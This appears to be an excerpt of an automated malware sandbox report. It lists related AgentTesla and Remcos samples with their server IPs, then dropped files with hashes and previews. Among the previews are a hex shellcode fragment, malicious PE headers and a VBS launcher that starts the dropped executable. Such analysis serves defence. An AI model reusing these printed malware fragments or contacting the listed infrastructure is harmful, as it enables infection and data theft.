                                                                                            • 172.245.123.18
                                                                                            citat #05022024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 172.245.123.18
                                                                                            citat-05022024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • 192.3.101.142
                                                                                            rE56cXOc25.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                            • 192.3.243.154
                                                                                            qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                            • 192.3.243.154
                                                                                            AS-COLOCROSSINGUSConfirm!!.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                            • 192.227.130.26
                                                                                            PIO88938MB.docx.docGet hashmaliciousUnknownBrowse
                                                                                            • 107.172.31.6
                                                                                            QUOTATION#30810.exeGet hashmaliciousRemcosBrowse
                                                                                            • 172.245.208.13
                                                                                            youhaveonefilefortody.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                            • 172.245.123.18
                                                                                            s9ZjvgSMt1.rtfGet hashmaliciousUnknownBrowse
                                                                                            • 192.3.101.142
                                                                                            getinher.docGet hashmaliciousAgentTeslaBrowse
                                                                                            • 172.245.123.18
                                                                                            citat #05022024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                            • 172.245.123.18
                                                                                            citat-05022024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                            • 192.3.101.142
                                                                                            rE56cXOc25.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                            • 192.3.243.154
                                                                                            qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                            • 192.3.243.154
                                                                                            ATOM86-ASATOM86NLQUOTATION#30810.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            proof of payment.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 178.237.33.50
                                                                                            fatura.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 178.237.33.50
                                                                                            proof of paymentt.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                            • 178.237.33.50
                                                                                            586 R1 M-LINE - GEORGIA 03.05.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                            • 178.237.33.50
                                                                                            INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                                                            • 178.237.33.50
                                                                                            No context
                                                                                            No context
                                                                                            Process:C:\Windows\SysWOW64\svchost.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):927
                                                                                            Entropy (8bit):4.9688781572708915
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:tkllndToCsGkMyGWKyGXPVGArwY3P+aoHDGdAvOO+E9F3im51w7bzo9dFmF6hjJd:qlBdT/NuKyGX85qO46m7OdF1zYQ
                                                                                            MD5:3C0C385570CFE1A630E258416A8D9FDC
                                                                                            SHA1:619D473E0F0DD8D008998A69F8ADFE749D24C015
                                                                                            SHA-256:724B4F917DA4600C4DA27E67FA68CA4447CC8F7DD3C711C6025F59E6ED97A8FC
                                                                                            SHA-512:B537C6F2A22227F19C40995F3FACB488ABB644D61D7945CDD2A6263F31DE193F1D33D1095B8163B4727BEE4E4D3B03BFEF06FC2C6BE09DB460E27162F0C7C286
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:{. "geoplugin_request":"81.181.54.104",. "geoplugin_status":206,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"",. "geoplugin_region":"",. "geoplugin_regionCode":"",. "geoplugin_regionName":"",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"RO",. "geoplugin_countryName":"Romania",. "geoplugin_inEU":1,. "geoplugin_euVATrate":19,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"45.9968",. "geoplugin_longitude":"24.997",. "geoplugin_locationAccuracyRadius":"200",. "geoplugin_timezone":"Europe\/Bucharest",. "geoplugin_currencyCode":"RON",. "geoplugin_currencySymbol":"lei",. "geoplugin_currencySymbol_UTF8":"lei",. "geoplugin_currencyConverter":4.6208.}
                                                                                            Process:C:\Users\user\AppData\Roaming\CKK.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):415558
                                                                                            Entropy (8bit):7.980802161270596
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
                                                                                            MD5:6167A7957E72F9B3A53C5667A7C56057
                                                                                            SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
                                                                                            SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
                                                                                            SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X
                                                                                            Process:C:\Users\user\AppData\Roaming\CKK.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9916
                                                                                            Entropy (8bit):7.600038819371061
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
                                                                                            MD5:85EC07A5B813744D5460158A4F4C3B75
                                                                                            SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
                                                                                            SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
                                                                                            SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
                                                                                            Malicious:false
                                                                                            Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                                                                            Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):415558
                                                                                            Entropy (8bit):7.980802161270596
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
                                                                                            MD5:6167A7957E72F9B3A53C5667A7C56057
                                                                                            SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
                                                                                            SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
                                                                                            SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
                                                                                            Malicious:false
                                                                                            Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X
                                                                                            Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9916
                                                                                            Entropy (8bit):7.600038819371061
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
                                                                                            MD5:85EC07A5B813744D5460158A4F4C3B75
                                                                                            SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
                                                                                            SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
                                                                                            SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
                                                                                            Malicious:false
                                                                                            Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                                                                            Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):415558
                                                                                            Entropy (8bit):7.980802161270596
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:B5V2kSfdEVJBkA8liRllAjk0/5F2m0SDEHPTmXWbdChTm+1hEDubJUoztcl8cC2h:rYkS1KWA8SbZ0F24gRsp1mD27tcy+
                                                                                            MD5:6167A7957E72F9B3A53C5667A7C56057
                                                                                            SHA1:00AC978BFF6FA30F4429ECD8810460642C5767B0
                                                                                            SHA-256:26939E2779D04E0E5CC020694B7EAF38525FD40E13E06DB165C08449A13FA347
                                                                                            SHA-512:0D705C994C7405358EB5531A5A19CC8A1EC1CCF2E25D76CAA2C7A368DA474FC1E65B688E79F1D978B079057B99B9D43D3954AAFD32553276CE0595B12C366CF8
                                                                                            Malicious:false
                                                                                            Preview:EA06.........b.5.R..nO:.J.V+Up..i..M...U*h...P...Z..+U.?.w4.O.q|M........V.8..h..=..9.Nf.Z_..P....j...B......(.....:8......_4X.LCm.m.Q*E.a..i'..6...r*..|sa.F......x-.9.....l...U.a.t.......<...;.H.r!..N..&.s..J.7.O....{...2.d,...3.4..1.X..3K.H........G.....gJ...U@..uf....o?.R....^.N.-.7.M*iH..;.....6...J.^.I..@..}*j.....i6....X.mf..$.m!..iUz.p.......;...:...q.........i_..j..... ._.=..V(@..7.L..@....SP...5B..g...M].Md....iJ.L..~..b.7.O.5Y.Vm6...)NUJ.L..x....?...B....l..\"..-6.4...........1Q..j.......%6i6.........t.V..i]N......@.i.V)....b....r...y.......(.<R&@...*5D..d...c-l.-:...(.x.W..>8..............EH..2*..;Z../si.O._!......I.p..z.......>+...<`X%f.5..6V{}>km.......4..x`...7.N&4..JO...+.).*...L~...~.....I.&.s..P*.j....oP.z...W#.X.cI.Rf..."....6Q*E2k\...sn...7.@.*f2.....K.*i0..#.....7.[._=U..h.x&.I.D.i..-Ri.7ez..5...2.I.3^.2.5.Z1?:d^;W.igSJUr.I.R.TKuf....4.P...E.Z; .M..j.R....B...@iSJ.J...w#V.b+..R...5....kUy...q.w#...*'.....gwsE.M...>i..X
                                                                                            Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9916
                                                                                            Entropy (8bit):7.600038819371061
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:m+cKumbG02JtWU+F6xcj8DiqAEgADXuLKZRvVE8ZGD/Lr6mjNAEOLiX:97umbGRJtWjAuYipVkX2KZ/E8ZGD/XVf
                                                                                            MD5:85EC07A5B813744D5460158A4F4C3B75
                                                                                            SHA1:9A40D20BD37344BB771FA10D81E813397AEA3B90
                                                                                            SHA-256:64B6B2C25F3830B385DC1E421742721FA60298892200EDF21BCC1DE44C9DDEFC
                                                                                            SHA-512:0D591CF85239BC1E138DBE0A877F26FABB2EE5924BEA0195488FF7816DFDCEB2D6EF5A864A424004C82671EC57F41C455A774822A7A3D75341B44B5AD7A3099C
                                                                                            Malicious:false
                                                                                            Preview:EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...
                                                                                            Process:C:\Windows\SysWOW64\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2f8d0607, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                            Category:dropped
                                                                                            Size (bytes):21037056
                                                                                            Entropy (8bit):1.1388601254862936
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:oO1U91o2I+0mZ5lChHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:oOEXs1LuHqqEXwPW+RHA6m1fN
                                                                                            MD5:83A46FAFD9B69282B8477939BC8D79D9
                                                                                            SHA1:F282087DE8A3AAC3A42D007A04F30373104BCA5E
                                                                                            SHA-256:0B8BDE9459B72FCF1AAB9179F13C5F42D533268035D8C556766F075B11821F58
                                                                                            SHA-512:019F54272E61E2A32B559DB0AEA0431F5AC0EFBFF0134893BEF4A98F7496A4BD7731DC23FD7655947111A8A3FFA968149F1BA58F102C72ABC3A098BD0CD0245A
                                                                                            Malicious:false
                                                                                            Preview:/...... ........................u..............................;:...{.......|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Roaming\CKK.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):494592
                                                                                            Entropy (8bit):7.519227488221947
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:21RC4HwaoZnJX1NpLh7MvRh+cnz3LbsUsVLLYn:d4zaJXdLh7gkcnzcZW
                                                                                            MD5:1C497907667183BDB5AEFBAF2BB74A28
                                                                                            SHA1:8DFD33CDF0751BBC78FB0F96799416CA6A06FB2E
                                                                                            SHA-256:5DD4707D740D281210F4F9F7756E054F87D90B6DB0C4DB0D6F65E42210C6E441
                                                                                            SHA-512:A37581C9BCA68617F3653CC5F35A41A00F9F8CB6BAC55C55C2A206E3AEEC2C8E02CAAC1C23C1337D9402F38F06EC0472B22094BFCB0D1A28A8701E4A35E03F19
                                                                                            Malicious:false
                                                                                            Preview:.n.ZTXL50J46..JJ.XZWXL54.4661JJ4XZWXL54J4661JJ4XZWXL54J4661JZ5XZYG.;4.=...K..y.?1?.D8[QDP'jW94978.V/.DC_j#Zx...lX[.Q.;<@n4XZWXL58..~.4|..)...J.R.Hj..J.<q&...4.P.O...&...2|.J.l#4..$...Jf..H..5F..)...K ..Hp..J...&...4A..O...'v..2.`J...4...%...Kf#W^~.44XZWXL54J4661JJ4..WX.43Jo..TJJ4XZWXL.4H5=7?JJF]ZWNN54J46.xIJ4HZWX.04J4v61ZJ4XXWXI55J4661OJ5XZWXL5.B4621JJ4XZUXL.4J$66!JJ4XJWX\54J466!JJ4XZWXL54J..01NK4XZ._L.~J4661JJ4XZWXL54J466.MJ.cZW..34r4661JJ4XZWXL54J4661..2XBWXLM.L4v61JJ4XZWXL54.16.5JJ4XZWXL54J4661JJ4XZWXL54J.BSI>J4X/&]L5$J46D4JJ0XZWXL54J4661JJ.XZ7v>QU>U66.3K4X.RXLO5J4@31JJ4XZWXL54J4v61.dP9.6XL5p.466!MJ4VZWX.34J4661JJ4XZWX.54..BZBJJ4XSWXL5DM4641JJ.^ZWXL54J4661JJtXZ.v+S].G66.HJ4X.PXL14J4611JJ4XZWXL54J4v61.dF+(4XL5..466.MJ4.ZWXH24J4661JJ4XZWX.54..DS]%)4X.lXL5.M46.1JJd_ZWXL54J4661JJtXZ.XL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J4661JJ4XZWXL54J
                                                                                            Process:C:\Windows\SysWOW64\svchost.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2
                                                                                            Entropy (8bit):1.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Qn:Qn
                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                            Malicious:false
                                                                                            Preview:..
                                                                                            Process:C:\Users\user\AppData\Roaming\CKK.exe
                                                                                            File Type:ASCII text, with very long lines (29744), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):29744
                                                                                            Entropy (8bit):3.547357781785406
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:wiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNb2E+Ix24vfF3if6gy6rE:wiTZ+2QoioGRk6ZklputwjpjBkCiw2Rl
                                                                                            MD5:34F0F69B281BEFD351CFD575548C405E
                                                                                            SHA1:BF1A53BE845395604BA157EF73ECC2881B5D59BB
                                                                                            SHA-256:D59EE71397DCB4366353F472260A6178C00A79DD50562E440B4E8CB26090EEF9
                                                                                            SHA-512:020C19E4CF6DEF3A80BC65257263D00BC365A90871B3E3EA90B02CD25B53F83FC081DA2443778ED9FDF11407E3F9BB6C2EED6343AB2CB414EAE84167F68B8686
                                                                                            Malicious:false
                                                                                            Preview:048B4C24088B008B093BC8760483C8FFC31BC0F7D8C38B0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c00000066
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):165
                                                                                            Entropy (8bit):1.4377382811115937
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                            Malicious:false
                                                                                            Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                            Process:C:\Users\user\AppData\Roaming\CKK.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):115664384
                                                                                            Entropy (8bit):7.999610134858133
                                                                                            Encrypted:true
                                                                                            SSDEEP:98304:OjTQYxsWRIEPpaELAHmk/vJ7mSL+6+J58:O3dxftPpawumkFZLcj8
                                                                                            MD5:B0D8802F1660EDEC8682E3081795E3F1
                                                                                            SHA1:7A58F476EF49834EB607B1BA331E4264478761EA
                                                                                            SHA-256:1159BA594CDAC833A7FA2EBDCB9A5ABA1F95FF77EC3A5C170DB00BCE505799C6
                                                                                            SHA-512:53E334C0936AF0644558EB07EAEF4C07E8D860A15DB77E53DA767E63C3F3391AB896AB0BC22BC4AB06F2C063CEB9F04673D0629062CDE16C16AAEDDAF8CA548C
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....b3f.........."..........6......w.............@..........................@............@...@.......@.....................d...|....@..D{.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...D{...@...|..................@..@.reloc...u.......v...p..............@..B........................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1369600
                                                                                            Entropy (8bit):7.252987156080183
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8aRMWJLRH4NnPncMw:GTvC/MTQYxsWR7aRLNHWPp
                                                                                            MD5:FA3641C75D2BEB68C01E8065EEFC4707
                                                                                            SHA1:1A2F7C3BB7190F8D8E1685E4E1FD77EBECC699BA
                                                                                            SHA-256:E28C8FC4052DBD472CC6245F605064F85EBB36371B43246066FDBECA547CBD17
                                                                                            SHA-512:6624AF74D2F22E87FD2E2ACEE58D15CDA54A7888567C9625B7CEDF481008144B54E52668D3ED65DF46ED04D8EA59FC308D5DB6E9805D20B0C8B0278C81A19C0F
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                                                            • Antivirus: Virustotal, Detection: 65%, Browse
                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....b3f.........."..........6......w.............@..........................@............@...@.......@.....................d...|....@..D{.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...D{...@...|..................@..@.reloc...u.......v...p..............@..B........................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):280
                                                                                            Entropy (8bit):3.3852268556191687
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:DMM8lfm3OOQdUfcltr1UEZ+lX1WlMg6DIAnriIM8lfQVn:DsO+vNlZ1Q1vgEPmA2n
                                                                                            MD5:D269DA8CD923BD670E7335233BE3E822
                                                                                            SHA1:A4BDA938DA1EB2220BBE64B968F970BE3E9C91C9
                                                                                            SHA-256:D5649D8912C0C7F6D375D02A3DB4244A56D9434582563826FC2D68D06873029C
                                                                                            SHA-512:437510A62BA0D95D8102D3F60A94D82B51D9295D6F048D38B5A04469F5014084F551DD9856D3DB1E5539C3D4B6AA66C876608C872527C1787044CD3074283BC4
                                                                                            Malicious:true
                                                                                            Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.i.l.v.e.x.e.s.\.d.e.b.l.a.t.e.r.a.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                                            Process:C:\Windows\SysWOW64\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):216
                                                                                            Entropy (8bit):6.973834768285198
                                                                                            Encrypted:false
